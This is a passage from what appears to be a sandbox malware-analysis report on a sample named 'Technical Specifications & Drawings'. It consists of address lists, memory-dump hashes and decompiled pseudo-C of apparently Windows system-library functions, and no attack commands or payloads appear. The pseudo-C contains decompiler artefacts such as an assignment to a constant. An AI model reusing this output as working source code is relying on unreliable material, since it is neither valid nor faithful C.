                                                  0x017bdbff
                                                  0x017bdbf1
                                                  0x017bdbdf
                                                  0x017bdb8f
                                                  0x017bdb92
                                                  0x017bdb95
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017bdb95
                                                  0x017bdb8d
                                                  0x017bdb85
                                                  0x017bdb74
                                                  0x017bdc9f
                                                  0x017bdca2
                                                  0x017bdcb0
                                                  0x017bdcb0
                                                  0x017bdad1
                                                  0x0180b4e5
                                                  0x0180b4c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017bd831
                                                  0x017bd80d
                                                  0x00000000
                                                  0x017bd800
                                                  0x0180b47f
                                                  0x0180b485
                                                  0x00000000
                                                  0x0180b485
                                                  0x017bd665
                                                  0x017bd652
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: f96402bd130d42d4970fa4d830342f8dcfb1fd8588a2c5caf1a7d82d4ff9578b
                                                  • Instruction ID: e1bf17bccc9874c7fef4ac2bd7a228d4c10e0922a250a37d393fce44a5bd6ac9
                                                  • Opcode Fuzzy Hash: f96402bd130d42d4970fa4d830342f8dcfb1fd8588a2c5caf1a7d82d4ff9578b
                                                  • Instruction Fuzzy Hash: 00E1C034A0065A8FEB35CF68C8C4BE9FBB2BF45318F0901E9D90997295D774AA81CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D513A Relevance: 1.8, APIs: 1, Instructions: 258timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E017D513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x189d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E017ED0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E017C2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L017C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E017EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E017BFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x189b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E017EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                  0x017d5142
                                                  0x017d514c
                                                  0x017d5150
                                                  0x017d5157
                                                  0x017d5159
                                                  0x017d515e
                                                  0x017d5165
                                                  0x017d5169
                                                  0x017d516c
                                                  0x017d5172
                                                  0x017d5176
                                                  0x017d517a
                                                  0x017d517a
                                                  0x017d517a
                                                  0x017d517f
                                                  0x01816d8b
                                                  0x01816d8e
                                                  0x01816d91
                                                  0x01816d95
                                                  0x01816d98
                                                  0x01816d9c
                                                  0x01816da0
                                                  0x01816da3
                                                  0x01816da7
                                                  0x01816e26
                                                  0x01816e26
                                                  0x01816e2a
                                                  0x017d51f9
                                                  0x017d51f9
                                                  0x017d51fe
                                                  0x01816e33
                                                  0x01816e33
                                                  0x01816e39
                                                  0x01816e3d
                                                  0x01816e46
                                                  0x01816e50
                                                  0x00000000
                                                  0x00000000
                                                  0x01816e52
                                                  0x01816e53
                                                  0x01816e56
                                                  0x01816e5d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01816e5f
                                                  0x01816e67
                                                  0x01816e77
                                                  0x01816e7f
                                                  0x01816e80
                                                  0x01816e88
                                                  0x01816e90
                                                  0x01816e9f
                                                  0x01816ea5
                                                  0x01816ea9
                                                  0x01816eb1
                                                  0x01816ebf
                                                  0x00000000
                                                  0x00000000
                                                  0x01816ecf
                                                  0x01816ed3
                                                  0x00000000
                                                  0x00000000
                                                  0x01816edb
                                                  0x01816ede
                                                  0x01816ee1
                                                  0x01816ee8
                                                  0x01816eeb
                                                  0x01816eed
                                                  0x01816ef0
                                                  0x01816ef4
                                                  0x01816ef8
                                                  0x01816efc
                                                  0x00000000
                                                  0x00000000
                                                  0x01816f0d
                                                  0x01816f11
                                                  0x01816f32
                                                  0x01816f37
                                                  0x01816f3b
                                                  0x01816f3e
                                                  0x01816f41
                                                  0x01816f46
                                                  0x00000000
                                                  0x00000000
                                                  0x01816f4c
                                                  0x01816f50
                                                  0x01816f50
                                                  0x01816f54
                                                  0x01816f62
                                                  0x01816f65
                                                  0x01816f6d
                                                  0x01816f7b
                                                  0x01816f7b
                                                  0x01816f93
                                                  0x01816f98
                                                  0x01816fa0
                                                  0x01816fa6
                                                  0x01816fb3
                                                  0x01816fb6
                                                  0x01816fbf
                                                  0x01816fc1
                                                  0x01816fd5
                                                  0x01816fda
                                                  0x01816fda
                                                  0x01816fdd
                                                  0x01816fe2
                                                  0x01816fe7
                                                  0x01816feb
                                                  0x01816fef
                                                  0x01816ff3
                                                  0x017d520c
                                                  0x017d520c
                                                  0x017d520f
                                                  0x017d5215
                                                  0x017d5234
                                                  0x017d523a
                                                  0x017d523a
                                                  0x017d5244
                                                  0x017d5245
                                                  0x017d5246
                                                  0x017d5251
                                                  0x017d5251
                                                  0x01816f13
                                                  0x01816f17
                                                  0x01816f17
                                                  0x01816f18
                                                  0x01816f1b
                                                  0x01816f1f
                                                  0x01816f23
                                                  0x00000000
                                                  0x01816f28
                                                  0x017d5204
                                                  0x017d5204
                                                  0x017d5208
                                                  0x00000000
                                                  0x017d5208
                                                  0x017d5185
                                                  0x017d5188
                                                  0x017d518a
                                                  0x017d518e
                                                  0x017d5195
                                                  0x01816db1
                                                  0x01816db5
                                                  0x01816db9
                                                  0x017d519b
                                                  0x017d519b
                                                  0x017d519e
                                                  0x017d51a7
                                                  0x017d51a9
                                                  0x017d51a9
                                                  0x017d51b5
                                                  0x017d51b8
                                                  0x017d51bb
                                                  0x017d51be
                                                  0x017d51c1
                                                  0x017d51c5
                                                  0x017d51c9
                                                  0x017d51cd
                                                  0x017d51cd
                                                  0x017d51d8
                                                  0x017d51dc
                                                  0x017d51e0
                                                  0x01816dcc
                                                  0x01816dd0
                                                  0x01816dd5
                                                  0x01816ddd
                                                  0x01816de1
                                                  0x01816de1
                                                  0x01816de5
                                                  0x01816deb
                                                  0x01816df1
                                                  0x01816df7
                                                  0x01816dfd
                                                  0x01816e01
                                                  0x01816e05
                                                  0x01816e09
                                                  0x01816e0d
                                                  0x01816e11
                                                  0x01816e11
                                                  0x017d51eb
                                                  0x01816e1a
                                                  0x01816e1f
                                                  0x01816e21
                                                  0x01816e23
                                                  0x00000000
                                                  0x017d51f1
                                                  0x017d51f1
                                                  0x00000000
                                                  0x017d51f1

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 439d45aac7ed6c0c8959c8ddbf5e13d5b9a30add7e08ce1cf6de158eb59ba5a0
                                                  • Instruction ID: 0fc6d83305f75b0dc490ae32201a41e7001edc539a481c5661913f5641e2e6d4
                                                  • Opcode Fuzzy Hash: 439d45aac7ed6c0c8959c8ddbf5e13d5b9a30add7e08ce1cf6de158eb59ba5a0
                                                  • Instruction Fuzzy Hash: 25C1F0B55093818FD354CF28C580A5AFBF1BF88304F284A6EF9999B352D771E985CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D03E2 Relevance: 1.8, APIs: 1, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E017D03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x189d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E017D0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E017EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E017BB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1897c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E017C7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E017C7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01827016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E017E9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E018269A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1897c04 != 0) {
						_t118 = _v12;
						_t120 = E0182A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1897bd8;
						if( *0x1897bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E017E95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E017E99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01823540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E017AB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E017EAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1898474 - 3;
										if( *0x1898474 != 3) {
											 *0x18979dc =  *0x18979dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E017C7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E017C7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01827016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1898708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1897b00; // 0x0
							asm("ror esi, cl");
							 *0x189b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E017E95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E017B7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                  0x017d03f1
                                                  0x017d03f7
                                                  0x017d03f9
                                                  0x017d03fb
                                                  0x017d03fd
                                                  0x017d0400
                                                  0x017d040a
                                                  0x01814c7a
                                                  0x017d0537
                                                  0x017d0547
                                                  0x017d0410
                                                  0x017d0410
                                                  0x017d0414
                                                  0x017d0417
                                                  0x017d041a
                                                  0x017d0421
                                                  0x017d0424
                                                  0x017d042b
                                                  0x017d043b
                                                  0x017d043e
                                                  0x017d043f
                                                  0x017d043f
                                                  0x017d0446
                                                  0x017d0449
                                                  0x017d044c
                                                  0x017d044f
                                                  0x017d0459
                                                  0x01814c8d
                                                  0x017d045f
                                                  0x017d045f
                                                  0x017d045f
                                                  0x017d0467
                                                  0x01814c97
                                                  0x01814c9d
                                                  0x01814ca4
                                                  0x01814caa
                                                  0x01814caf
                                                  0x01814cb1
                                                  0x01814cc3
                                                  0x01814cb3
                                                  0x01814cbc
                                                  0x01814cbc
                                                  0x01814cc8
                                                  0x01814ccb
                                                  0x01814cd7
                                                  0x01814cda
                                                  0x01814cdf
                                                  0x01814cdf
                                                  0x01814ccb
                                                  0x01814ca4
                                                  0x017d046d
                                                  0x017d046f
                                                  0x017d046f
                                                  0x017d0471
                                                  0x017d0476
                                                  0x017d047a
                                                  0x017d047b
                                                  0x017d0483
                                                  0x017d0489
                                                  0x017d048d
                                                  0x00000000
                                                  0x00000000
                                                  0x01814ce9
                                                  0x01814cef
                                                  0x01814d22
                                                  0x01814d22
                                                  0x00000000
                                                  0x01814d22
                                                  0x01814cf1
                                                  0x01814cf7
                                                  0x00000000
                                                  0x00000000
                                                  0x01814cf9
                                                  0x01814cff
                                                  0x00000000
                                                  0x00000000
                                                  0x01814d05
                                                  0x01814d07
                                                  0x00000000
                                                  0x00000000
                                                  0x01814d0d
                                                  0x01814d0f
                                                  0x01814d14
                                                  0x01814d16
                                                  0x00000000
                                                  0x00000000
                                                  0x01814d1c
                                                  0x01814d1c
                                                  0x017d0499
                                                  0x017d0535
                                                  0x017d0535
                                                  0x00000000
                                                  0x017d0535
                                                  0x017d04a6
                                                  0x01814d2c
                                                  0x01814d37
                                                  0x01814d39
                                                  0x01814d3b
                                                  0x00000000
                                                  0x00000000
                                                  0x01814d41
                                                  0x01814d48
                                                  0x017d0527
                                                  0x017d052b
                                                  0x017d052d
                                                  0x017d0530
                                                  0x017d0530
                                                  0x00000000
                                                  0x017d052b
                                                  0x01814d4e
                                                  0x017d04ac
                                                  0x017d04ac
                                                  0x017d04af
                                                  0x017d04b2
                                                  0x017d04b7
                                                  0x017d04b9
                                                  0x017d04bb
                                                  0x017d04bd
                                                  0x017d04bf
                                                  0x017d04c5
                                                  0x017d04c9
                                                  0x01814d53
                                                  0x01814d59
                                                  0x01814db9
                                                  0x01814dba
                                                  0x01814dbf
                                                  0x01814dc2
                                                  0x01814dc4
                                                  0x01814dc7
                                                  0x01814dce
                                                  0x00000000
                                                  0x01814dce
                                                  0x01814d5b
                                                  0x01814d61
                                                  0x00000000
                                                  0x00000000
                                                  0x01814d63
                                                  0x01814d69
                                                  0x00000000
                                                  0x00000000
                                                  0x01814d6b
                                                  0x01814d6e
                                                  0x01814d74
                                                  0x01814d76
                                                  0x01814d7c
                                                  0x01814d7e
                                                  0x01814d84
                                                  0x01814d89
                                                  0x01814d8c
                                                  0x01814d8d
                                                  0x01814d92
                                                  0x01814d95
                                                  0x01814d96
                                                  0x01814d98
                                                  0x01814d9a
                                                  0x01814d9f
                                                  0x01814da4
                                                  0x01814da6
                                                  0x01814da8
                                                  0x01814daf
                                                  0x01814db1
                                                  0x01814db1
                                                  0x01814daf
                                                  0x01814da6
                                                  0x01814d84
                                                  0x01814d7c
                                                  0x00000000
                                                  0x01814d74
                                                  0x017d04d6
                                                  0x01814de1
                                                  0x017d04dc
                                                  0x017d04dc
                                                  0x017d04dc
                                                  0x017d04e4
                                                  0x01814deb
                                                  0x01814df1
                                                  0x01814df8
                                                  0x01814dfe
                                                  0x01814e03
                                                  0x01814e05
                                                  0x01814e17
                                                  0x01814e07
                                                  0x01814e10
                                                  0x01814e10
                                                  0x01814e1c
                                                  0x01814e1f
                                                  0x01814e35
                                                  0x01814e35
                                                  0x01814e1f
                                                  0x01814df8
                                                  0x017d04f1
                                                  0x017d04fa
                                                  0x01814e3f
                                                  0x01814e47
                                                  0x01814e5b
                                                  0x01814e61
                                                  0x01814e67
                                                  0x01814e69
                                                  0x01814e71
                                                  0x01814e73
                                                  0x017d0500
                                                  0x017d0500
                                                  0x017d0500
                                                  0x017d04fa
                                                  0x017d0508
                                                  0x017d051d
                                                  0x017d051d
                                                  0x017d051f
                                                  0x017d0524
                                                  0x00000000
                                                  0x017d0524
                                                  0x017d0515
                                                  0x017d0517
                                                  0x01814e7a
                                                  0x01814e7c
                                                  0x00000000
                                                  0x00000000
                                                  0x01814e85
                                                  0x00000000
                                                  0x01814e85
                                                  0x00000000
                                                  0x017d0517

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4d3cc09d67fbdac155841967b70981f47e2ffd6b94711880b74a1bf4083ffd2
                                                  • Instruction ID: f5f4bc0a2148ae608ad3d99465286e1b641111f713385dfde5122432dc9cd8bc
                                                  • Opcode Fuzzy Hash: c4d3cc09d67fbdac155841967b70981f47e2ffd6b94711880b74a1bf4083ffd2
                                                  • Instruction Fuzzy Hash: 9C910772E002199FEF229A6CC848FADBBB8AB05724F550265FA11E72D5D7749E40CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017AB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E017AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x187f7a8);
				E017FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E017FD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E017ED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
